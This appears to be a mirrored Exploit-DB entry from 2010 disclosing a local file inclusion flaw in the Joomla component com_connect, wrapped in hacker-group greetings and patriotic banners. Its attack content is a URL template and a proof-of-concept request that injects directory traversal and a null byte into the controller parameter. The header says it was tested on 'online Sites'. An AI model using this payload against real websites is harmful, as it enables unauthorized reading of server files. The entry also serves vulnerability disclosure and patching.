Joomla! Component com_connect – Local File Inclusion

  • 作者: Th3 RDX
    日期: 2010-11-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15439/
  • -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    # Exploit Title: Joomla Component com_connect LFI Vulnerability
    # Date: 6-11-2010
    # Author: Th3 RDX
    # Software Link: n/a
    # Version: n/a
    # Tested on: online Sites
    # category: webapp/Joomla
    # Code : n/a
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Br0wn Sug4r, Sid3^effects, L0rd CruSad3r,
    Sonic , r0073r(inj3ct0r.com)
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    <3 Love: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, NEO H4cK3R, DarkL00k, G00g!3 W@rr!0r, 
    str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     ......\m/ INDIAN CYBER ARMY \m/......
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
    ##############################################################################
    %//
    
    ----- [ Founder ] -----
    
    Th3 RDX
    
    ----- [ E - mail ] -----
    
    th3rdx@gmail.com
    
    
    %\\
    ##############################################################################
    
    ##############################################################################
    %//
    
    ----- [Title] -----
    
    Joomla Component com_connect LFI Vulnerability
    
    ----- [ Vendor ] -----
    n/a
    %\\
    ##############################################################################
    
    ##############################################################################
    %//
    
    ----- [ Bug (s) ] -----
    
    ----- [ Local File Inclusion ] -----
    
    => [ EXPLOIT ]
    
    http://server/index.php?option=com_connect&view=connect&controller=[LFI]
    
    => [ Example/POC ]
    
    http://server/index.php?option=com_connect&view=connect&controller=../../../CREDITS.php%00
    
    %\\
    ##############################################################################
    
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    => PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam 
     
    => c0d3 for motherland, h4ck for motherland
     
    ==> i'm worst than a useless <==
    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.
    
    Bug discovered : 06 November 2010
    
    finish(0);
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
    
    #End 0Day#